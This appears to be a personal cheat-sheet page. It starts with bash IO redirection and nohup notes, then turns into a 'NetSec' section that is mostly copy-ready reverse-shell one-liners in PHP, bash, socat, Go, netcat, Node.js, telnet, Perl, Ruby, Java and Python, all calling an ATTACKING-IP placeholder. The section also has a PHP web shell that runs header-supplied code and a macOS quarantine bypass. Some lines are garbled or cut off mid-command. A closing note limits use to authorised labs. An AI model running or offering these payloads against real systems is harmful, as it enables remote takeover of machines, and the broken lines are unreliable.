IO
Bash has special symbols which are reserved to stand-in for useful data. Output streamed to stdout and stderr and invoked using 1 and 2.
Certain symbols are reserved for the redirection of the output from one program to another
Feature | Syntax | Example | Description |
|---|---|---|---|
Pipe | | | cat file.txt | grep "error" | Sends the output of cat into grep for filtering. |
**Redirect (Overwrite)** | > | ls > files.txt | Writes the output of ls into files.txt, overwriting it. |
**Redirect (Append)** | >> | date >> log.txt | Appends the current date to log.txt without erasing previous content. |
**Redirect (Input)** | < | sort < names.txt | Feeds the contents of names.txt into sort as standard input. |
| >2&1 | ls non-existantflile.dat > all.log 2>&1 | 2>& redirects file handle "2" (almost always **stderr**) to some other file handle (it's generally written as 2>&1, which redirects stderr to the same place as stdout). | |
2> redirects output to file handle 2 (usually **stderr**) to a file. | |||
2> redirects output to file handle 2 (usually **stderr**) to a file. | |||
To avoid exit signals propagating to child processes of the terminal and shell, run the command with nohup, i.e.: |
nohup cmd &
To ignore all program output and avoid the nohup.out file, you can redirect stdout and stderr to /dev/null like this (with bash):
nohup cmd &> /dev/null &
zsh has a shorthand for this:
cmd &|`. Bypass macOS untrusted application quarantine
xattr -cr <name-of-executable>NetSec
setup netcat listener
nc -nvlp <port>Reverse shells
PHP
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'(Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?><?php exec("/bin/bash -c 'bash -i > /dev/tcp/ATTACKING-IP/1234 0>&1'");<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);Bash
exec /bin/bash 0&0 2>&00<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; donebash -i >& /dev/tcp/ATTACKING-IP/80 0>&1socat
socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &golang
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.gonetcat
nc -lnvp 80nc -e /bin/sh ATTACKING-IP 80/bin/sh | nc ATTACKING-IP 80rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p(OpenBSD netcat)
mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lolNode.js
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');telnet
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/ptelnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Perl Windows Reverse Shell
```perl
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STRuby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sockSafety note
Keep security-related snippets for authorised lab boxes, CTFs, or your own systems only. When copying commands from this page, replace placeholders deliberately, run inside a controlled environment, and prefer documenting what the command is meant to test rather than blindly pasting it into a live machine.